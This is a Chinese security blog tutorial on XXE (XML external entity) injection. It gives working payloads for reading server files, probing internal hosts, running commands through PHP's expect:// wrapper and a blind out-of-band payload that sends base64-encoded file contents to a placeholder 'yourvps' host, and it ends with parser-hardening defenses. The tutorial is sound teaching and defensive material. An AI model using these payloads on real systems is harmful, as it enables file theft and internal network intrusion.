XXE原理及利用防御

最新推荐文章于 2025-04-09 20:58:58 发布
原创 最新推荐文章于 2025-04-09 20:58:58 发布 · 460 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

本文深入探讨了XXE(XML External Entity Injection)漏洞,包括其概念、利用方式如文件读取、内网探测和远程代码执行。通过示例展示了如何构造XML文档触发XXE,并列举了多种协议利用和无回显情况下的攻击手段。最后,提出了禁用外部实体和过滤用户输入等防御措施。

XXE

概述

XXE

XXE 漏洞全称XML External Entity Injection,即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

DTD

文档类型定义(DTD)可定义合法的 XML 文档构建模块它使用一系列合法的元素来定义文档的结构DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用

  • 内部的 DOCTYPE 声明
<!DOCTYPE 根元素 [元素声明]>
  • 外部文档声明
<!DOCTYPE 根元素 SYSTEM ”文件名”> //引用本地文件
<!DOCTYPE 根元素 PUBLIC "DTD名称" "DTD文件的URL">  //引用网络文件

DTD 实体

就是定义一个变量来提取冗余数据。
内部实体声明

<!ENTITY 实体名称 ”实体的值”>

外部实体声明

<!ENTITY 实体名称 SYSTEM ”URI”>

参数实体声明

<!ENTITY %实体名称 ”实体的值”>
<!ENTITY %实体名称 SYSTEM ”URI”>

不了解xml和dtd的可以看我前面两篇文章
xml概述
xml文件约束dtd

XXE利用

  • 读文件
    类似这样,如果有回显的话就可以利用file协议读取服务器的文件
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE ANY [  
<!ENTITY name SYSTEM "file:///C:/windows/win.ini">  
]>
<root>&name;</root>
  • 内网探针或攻击内网应用(触发漏洞地址)
    利用http协议来探针内网的文件和端口
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE ANY [  
<!ENTITY name SYSTEM "http://loaclhost:8080/index.html">  
]>
<root>&name;</root>
  • RCE
    由于 PHP 的 expect 并不是默认安装扩展,如果安装了这个 expect 扩展我们就能直接利用 XXE 进行 RCE 。
<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
	<file>
		&cmd
	</file>
</dir>
  • 引入外部实体 dtd
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE ANY [  
<!ENTITY name SYSTEM "http://your.com/evil.dtd">  
]>
<root>&name;</root>
  • 无回显-读取文件
    xxe.xml文件
<!ENTITY % all "<!ENTITY send SYSTEM 'http://yourvps/%file;'>">

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % dtd SYSTEM "http://yourvps/xxe.xml">
%dtd; %all;
]>
<value>&send;</value>

通过%dtd引入xxe.xml,之后%all引入send的定义,最后引用了实体send,把%file文件内容通过一个http请求发了出去,在vps服务器的日志文件就可以看到base64加密后的内容

  • 协议-读文件(绕过)
    利用不同的协议去绕过防御,类似php:filter php:input等在文件包含中出现过的php伪协议都可以用上
  • 有时当前请求可以接收xml数据包,但是数据包格式不是xml,可以改请求头Content-Type 为xml格式,在把xml文件放到请求体里。

XXE漏洞修复与防御方案

禁用外部实体

PHP: libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);

Python:
from lxml import etreexml Data = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的 XML 数据

过滤关键词:<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC

工具使用

XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具,
它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。
详细工具使用

参考文章
从XML相关一步一步到XXE漏洞
# XXE 打怪升级之路

XXE 基础原理(XML external entity)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-23 3016
XXE 基本原理(XML external entity) 文章目录XXE 基本原理(XML external entity)什么是XML外部实体 (XXE) 注入?什么是 XML?什么是 DTD什么是 XML 外部实体?案例分析pikachu xxe外部实体利用 XXE 检索文件利用 XXE 执行 SSRF 攻击带外交互的盲 XXE利用XXE 使用恶意外部 DTD 窃取数据 什么是XML外部实体 (XXE) 注入? XML 外部实体是一种自定义 XML 实体,其定义的值是从声明它们的 DTD 外部加载
XXE漏洞原理防御方式。
dreamthe的博客
11-16 3803
写这篇文章目的就是想认真理理XEE这个漏洞,因为在学习过程中,听过老师的一些课,看过很多文章解释,我觉得讲的都是很官方话或者专业用语,对于初学者理解很难,可能我理解能力不够哈,嘻嘻。以下内容仅仅是我个人理解,以及我个人的比喻,比喻可以让你更好理解这个东西,这是我学习的一个方法,可是使的抽象的东西变得比较具体一些。 xml简单了解 XXE这个漏洞的理解,首先我们了解xml文档,因为该漏洞就是由xml文档引起的 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用.
XXE原理利用防御
安全大白
04-19 639
0x00 前言 一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。 ***更欢迎大家去我的博客提出意见:***xiao’s blog 0x01 XXE原理 在讲XXE之前,先了解一下XML的结构 XXE即XML实体注入,漏洞主要发生在XML的DTD部分,关键字SYSTEM能够读取URI里面的内容,将读取到的内容赋值到实体中,XML在使用的过程中,将实体输出,从而产生漏洞。P...
xxe原理利用
hackzkaq的博客
03-09 825
零基础学黑客,搜索公众号:白帽子左一 什么是xxe XML External Entity Injection 外部实体注入,该漏洞发生在应用程序解析XML输入时, 没有禁止外部实体的加载,导致可加载任意外部文件,造成文件读取、命令执行(有点极端)、内网端口扫描、攻击内网网站、发起dos攻击等危害。 什么是xml 一种标记语言,被设计用来传输和存储数据(html是用来显示数据): <?xml version="1.0" encoding="UTF-8"?> <person> &l
XXE原理利用防御
Key_book(句芒安全实验室)
06-30 4546
XML外部实体(XXE) 1.何为XXEXXE是xml外部实体注入. 说到这里简单介绍下什么是xml,xml是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言.xml文档结构包括xml声明、DTD文档类型定义(可选)、文档元素. 所有的XML文档均有以下简单的构建模块组成: ·元素(元素是XML以及HTML文档的...
XXE漏洞原理/防御
热门推荐
wangyuxiang946的博客
07-16 1万+
XXE又叫 XML外部实体注入 , 攻击者修改DTD引入的外部文件 , 从而执行攻击 。
XXE漏洞深度解析:原理利用防御
最新发布
2402_86373248的博客
04-09 755
3. 文中部分技术原理参考自OWASP XXE防御指南,原文链接:https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html。XXE(XML External Entity),全称XML外部实体注入漏洞,是由于应用程序在解析XML输入时未严格限制外部实体加载而导致的安全问题。- 依赖库升级:使用修复XXE的解析库(如Python的defusedxml)。DOCTYPE>声明。
java --XXE 攻击原理防御
tryheart的博客
09-05 2194
什么是 XEE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。需要强调的是利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。 XEE 背景 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采
XXE原理
weixin_48421613的博客
09-03 804
XEE漏洞 XXE(XML External Entity Injection)外部实体注入漏洞,XML在引用外部实体是时候,攻击者可以构造恶意的XML代码,以造成任意文件读取、命令执行甚至是中断服务器。 XML是一种是分流行的标记语言,他和HTML区别就是被设计用来传输、存储数据使用。 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标
xxe漏洞原理,简单复现及防御
weixin_56513549的博客
04-11 1252
xxe漏洞原理 Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害 xxe联系靶场 http://web.jarvisoj.com:9882/ 复现步骤 打开代理进行抓包操作 明显看到使用的是json读取 我们将包放进重发模块修改成xml读取方式 读取flag包 <?xml versio..
XXE漏洞原理
weixin_44843084的博客
05-20 649
XXE漏洞原理 XXE(外部实体注入)是XML外部实体注入。 当应用程序允许引用外部实体时,通过XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等。 常规的POST的content-type为application/x-www-form-urlencoded,但只要将其修改为application/json,就可以传入json格式的POST数据,修改为application/xml,就可以传入XML格式的数据。常规的WAF一般只检测application/x-www-form-urle
XXE原理简介、防御方案
qq_37432174的博客
11-24 6730
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
XXE漏洞原理--简单理解
一醉一休的博客
03-16 3887
XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据 DTD(Document Type Definition 文档类型定义) 1.DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用 2.外部实体(即
XXE原理利用与修复详解
GalaxySpaceX的博客
07-20 1654
XXE原理+利用+修复
1.7服务端漏洞——XXE漏洞原理
The code way of kinnisoy
07-07 762
XXE漏洞原理 1.XXE是什么 XXE全称是——XML External Entity,也就是XML外部实体注入攻击.漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 xml实体注入就是利用了客户端返回xml提交数据时,注入远程调用xml实体的代码来实现一些想要的功能。 要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。 2.XML介绍 XML数据传输类型(同类:JSON 序列化) XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 语法规则: 1.所有的X
XXE详解
qq_51780583的博客
03-23 6455
XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。
XXE漏洞原理和案例实验演示;ssrf漏洞原理和实验案例演示
qq_44696653的博客
06-03 943
一、XXE漏洞原理和案例实验演示 XXE(xml external entity -injection“) 1.XML xml是一种可扩展的标记语言,可用来存储数据、传输数据 XML格式: 第二部分:DTD DTD:Document Type Defintion 文档类型定义,用来为XML文档定义语义约束。来约束XML文档格式。DTD中不同类型: DTD外部实体举例: 外部引用可以支持htt...
XXE漏洞原理和pikachu靶场实验
03-16 1474
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
xxe漏洞原理防御方式
05-25
XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值